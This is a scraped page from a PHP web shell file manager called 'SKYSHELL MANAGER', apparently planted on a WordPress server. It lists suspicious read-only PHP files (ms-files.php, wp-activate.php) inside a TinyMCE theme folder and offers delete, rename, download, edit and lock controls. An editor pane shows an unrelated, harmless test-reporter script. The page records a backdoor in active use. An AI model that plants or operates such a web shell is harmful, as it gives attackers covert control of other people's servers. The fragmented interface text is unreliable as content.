📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dump.js
exports = module.exports = Dump var Base = require('./base') , cursor = Base.cursor , color = Base.color , useColors = Base.useColors , util = require('util') function Dump(runner) { Base.call(this, runner); var events = [ 'start', 'version', 'suite', 'suite end', 'test', 'pending', 'pass', 'fail', 'test end', ]; var i = process.argv.indexOf('dump') if (i !== -1) { var args = process.argv.slice(i + 1) if (args.length) events = args } runner.on('line', function (c) { if (c.trim()) process.stderr.write(Base.color('bright yellow', c)) }) events.forEach(function (ev) { runner.on(ev, function (obj) { console.log(ev) if (arguments.length) { console.log(util.inspect(obj, false, Infinity, useColors)) console.log() } }) }) runner.on('end', function () { console.log('end') console.log(runner.stats) console.log() }) }
Save